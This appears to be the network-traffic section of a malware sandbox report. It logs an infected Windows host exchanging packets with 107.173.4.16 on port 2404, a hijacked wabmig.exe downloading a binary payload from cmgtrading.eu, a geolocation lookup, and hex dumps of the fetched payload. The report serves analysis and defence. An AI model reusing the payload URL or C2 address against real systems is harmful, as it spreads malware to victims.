                                                                          Oct 8, 2024 00:40:28.359011889 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359023094 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359025955 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359055996 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359144926 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359175920 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359335899 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359483004 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359496117 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359505892 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359520912 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359536886 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359548092 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359559059 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359561920 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359570026 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359581947 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359601974 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359626055 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359666109 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359678030 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359689951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359700918 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359709978 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359710932 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359721899 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359728098 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359733105 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359744072 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359744072 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359755993 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359766006 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359770060 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359796047 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.359797001 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.360100985 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.360112906 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.360135078 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.360153913 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.364980936 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365176916 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365187883 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365212917 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365533113 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365545988 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365556002 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365566969 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365566969 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365592003 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365601063 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365612030 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365624905 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365634918 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365634918 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365645885 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365652084 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365657091 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365674019 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365675926 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365684986 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365695953 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365705967 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365715981 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365716934 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365729094 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.365739107 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.365755081 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366111040 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366174936 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366235018 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366252899 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366261959 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366288900 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366292953 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366303921 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366313934 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366323948 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366332054 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366334915 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366345882 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366348028 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366357088 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366367102 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366374969 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366378069 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366389990 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366399050 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366403103 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366416931 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366431952 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366444111 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366617918 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366633892 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366646051 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366657019 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366657019 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366667986 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366674900 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366678953 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366699934 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366731882 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366744041 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366755009 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366765976 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366780043 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366784096 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366794109 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366801023 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366805077 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366815090 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366815090 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366826057 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366837978 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.366843939 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.366874933 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.367257118 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440618992 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440633059 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440645933 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440700054 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440720081 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440732956 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440743923 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440757036 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440768003 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440777063 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440807104 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440911055 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440923929 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440936089 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440948009 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440959930 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440970898 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440972090 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.440983057 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.440994978 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441004038 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441008091 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441020966 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441025019 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441032887 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441062927 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441112995 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441173077 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441185951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441215038 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441277981 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441291094 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441303968 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441314936 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441318035 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441327095 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441343069 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441369057 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441576004 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441587925 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441598892 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441611052 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441622972 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441636086 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441644907 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441649914 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441670895 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441747904 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441760063 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441771984 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441782951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441795111 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441797018 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441807985 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441823006 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441823959 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441836119 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441864967 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.441934109 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441946030 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441957951 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441970110 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441986084 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.441991091 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442009926 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.442040920 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442054033 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442065001 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442075968 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442086935 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.442094088 CEST499842404192.168.2.10107.173.4.16
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 00:40:22.706284046 CEST | 49589 | 53 | 192.168.2.10 | 1.1.1.1
Oct 8, 2024 00:40:22.810601950 CEST | 53 | 49589 | 1.1.1.1 | 192.168.2.10
Oct 8, 2024 00:40:27.046742916 CEST | 50846 | 53 | 192.168.2.10 | 1.1.1.1
Oct 8, 2024 00:40:27.057245016 CEST | 53 | 50846 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 00:40:22.706284046 CEST | 192.168.2.10 | 1.1.1.1 | 0xd41d | Standard query (0) | cmgtrading.eu | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:40:27.046742916 CEST | 192.168.2.10 | 1.1.1.1 | 0xb7e7 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 00:40:22.810601950 CEST | 1.1.1.1 | 192.168.2.10 | 0xd41d | No error (0) | cmgtrading.eu | | 185.26.107.57 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 00:40:27.057245016 CEST | 1.1.1.1 | 192.168.2.10 | 0xb7e7 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                          • cmgtrading.eu
                                                                          • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49980 | 185.26.107.57 | 80 | 3200 | C:\Program Files (x86)\Windows Mail\wabmig.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:40:22.824076891 CEST | 174 | OUT | GET /CubBVEODo227.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: cmgtrading.eu
                                                                          Cache-Control: no-cache
Oct 8, 2024 00:40:23.505775928 CEST | 393 | IN | HTTP/1.1 301 Moved Permanently
                                                                          server: nginx
                                                                          date: Mon, 07 Oct 2024 22:40:23 GMT
                                                                          content-type: text/html
                                                                          content-length: 162
                                                                          location: https://cmgtrading.eu/CubBVEODo227.bin
                                                                          set-cookie: SERVID=A; path=/
                                                                          connection: close
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49983 | 178.237.33.50 | 80 | 3200 | C:\Program Files (x86)\Windows Mail\wabmig.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:40:27.067260981 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                                          Host: geoplugin.net
                                                                          Cache-Control: no-cache
                                                                          Timestamp: Oct 8, 2024 00:40:27.786236048 CEST | Bytes transferred: 1170 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                          date: Mon, 07 Oct 2024 22:40:27 GMT
                                                                          server: Apache
                                                                          content-length: 962
                                                                          content-type: application/json; charset=utf-8
                                                                          cache-control: public, max-age=300
                                                                          access-control-allow-origin: *
                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                          Session ID: 0 | Source IP: 192.168.2.10 | Source Port: 49981 | Destination IP: 185.26.107.57 | Destination Port: 443 | PID: 3200 | Process: C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 216 | Direction: OUT | Data: GET /CubBVEODo227.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: cmgtrading.eu
                                                                          Connection: Keep-Alive
                                                                          Cookie: SERVID=A
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 318 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Mon, 07 Oct 2024 22:40:24 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 494656
                                                                          Last-Modified: Tue, 24 Sep 2024 01:09:35 GMT
                                                                          Connection: close
                                                                          ETag: "66f2114f-78c40"
                                                                          Expires: Wed, 06 Nov 2024 22:40:24 GMT
                                                                          Cache-Control: max-age=2592000
                                                                          Accept-Ranges: bytes
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16066 | Direction: IN | Data Raw: fe 5f 54 5f 80 94 20 d8 39 17 8c 7f f5 9f 5b a0 0f a6 1e 68 f4 96 b4 60 13 54 a4 7c e0 d1 13 48 5f 61 0b bc 64 46 4c b2 bd d0 24 f1 e3 71 1b 82 35 16 12 c9 9e 1f b1 bc dc 36 f6 79 eb ff 1b 0b 3a dc e3 2e f3 d0 0e a5 eb 27 06 cb 85 03 2a 8c cf d7 95 59 e6 fa 54 6e 2a 03 35 20 85 6b 11 73 86 c0 26 5e fc 4a 1a 5e b0 ad a8 b6 71 09 1a 1d 49 5f fb 1d 62 b8 e3 93 4d 3c 02 ca ec 67 67 6f b5 bf d6 dc f1 10 23 91 1b 01 09 ee 3c 6b 81 8d 9f 56 bf 8e 45 2e 80 24 6f 08 fe af 05 c4 c0 c3 fa 70 d6 3d 9f 3c 4c dd 6d a2 ea e5 65 6b 69 a6 d8 b6 e1 66 b6 6a e6 15 b7 c0 7f 52 75 e2 6d 53 ff 38 fa 98 6d 5a 28 86 b8 d3 01 77 69 cf 9b 65 aa cb 0b 1d b2 9b 81 3a 09 a2 fe 22 48 76 41 aa 33 b5 e3 7b a7 f4 38 b4 97 3b 81 5a a1 1f aa e5 8b 39 48 25 2f ed 8f 05 9b 84 d6 1f c8 eb 54
                                                                          Data Ascii: _T_ 9[h`T|H_adFL$q56y:.'*YTn*5 ks&^J^qI_bM<ggo#<kVE.$op=<LmekifjRumS8mZ(wie:"HvA3{8;Z9H%/T
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: 3c 6e 9f 53 7d f5 da 29 bd 77 a2 21 e7 af 93 7b c2 8d 33 f3 e3 ea f7 f4 b4 50 11 42 bf 6d 49 8e 36 34 6e ea 0a f4 29 c7 03 cd e6 a6 eb ec 5a fa 1a 70 e8 b0 fb 3a 74 cc 6f 6f 25 c7 99 1b fe 4b e8 83 a9 60 48 64 76 32 f9 bd 89 97 b5 dd 93 62 5e 6b dc 80 c4 4c 6a d3 45 50 52 00 98 82 e9 86 5c a1 df fb 0d b0 b6 1d 8f b7 64 1f e2 12 50 19 6c bf f9 52 ab 08 a7 cb f9 75 b2 20 67 9c 53 ac 65 5e 9c b2 89 4c e4 64 04 e3 5a 6c 2b 10 a7 78 7c 19 58 ff 16 cb 9b 93 88 74 a0 b9 df 12 0a 90 e0 1c 3b 42 7d 05 7d 40 31 05 69 60 e3 bf 71 24 bc 89 f2 9e d9 94 5d ff 20 35 0c 89 be b0 2b fc 4f eb d1 06 e4 67 2c dc 59 5a 43 c5 13 7c 75 e4 bf d9 2f 90 17 cc 76 bc a7 18 d2 7b a2 03 12 95 8c cd 39 a6 0c 28 a3 35 d0 df 69 3a 91 6b 30 e1 39 17 88 76 b7 4a aa c0 a0 4c 09 c5 ed df 7c
                                                                          Data Ascii: <nS})w!{3PBmI64n)Zp:too%K`Hdv2b^kLjEPR\dPlRu gSe^LdZl+x|Xt;B}}@1i`q$] 5+Og,YZC|u/v{9(5i:k09vJL|
                                                                          Timestamp: 2024-10-07 22:40:24 UTC | Bytes transferred: 16384 | Direction: IN | Data Raw: bb 12 3b a5 21 3e 05 76 1b 8b 79 fe 63 44 38 4d 30 10 d8 8b 86 72 14 46 18 88 28 18 14 c6 12 30 fa 95 fc b8 6d bd 83 3a e6 79 3f 14 9e 77 07 ee 3a 39 a0 a8 b6 71 09 45 43 12 d4 1e 40 a1 ed 68 7f cc d0 9a ca f4 66 e7 52 a3 8b 2b d2 f1 f7 7c d7 cb cd 0f 90 2a a3 77 e5 f6 25 12 73 5f be 18 a9 e6 d2 de cc 64 29 42 b4 03 15 8c d3 73 1e d1 b3 db 34 7b 46 cd 3c b7 c3 95 52 49 53 70 f4 ee 1f 93 43 93 4a f8 a7 65 d8 3f 13 aa 30 20 40 fe ae 7d 44 bf f6 de 2a a5 8c 56 4d 2c ee bc 89 dd 9c 78 69 33 b4 83 5e 96 d4 4c df df 8e 3d be 6a 11 a2 4f 69 00 8e 43 7c 73 e3 44 a6 a4 e6 1b 4d f0 b2 a8 b7 3f dc f1 69 38 0f 46 4a 37 82 d6 48 0f 20 88 c7 42 ed ab 4b 3d 62 88 c2 4e 64 0e df e7 41 c0 f7 db 6c 65 25 1b 75 ad 4c 4f a5 e6 87 c2 7b 32 9b ac 38 de 83 e8 b5 a6 4e 9c 85 b4
                                                                          Data Ascii: ;!>vycD8M0rF(0m:y?w:9qEC@hfR+|*w%s_d)Bs4{F<RISpCJe?0 @}D*VM,xi3^L=jOiC|sDM?i8FJ7H BK=bNdAle%uLO{28N
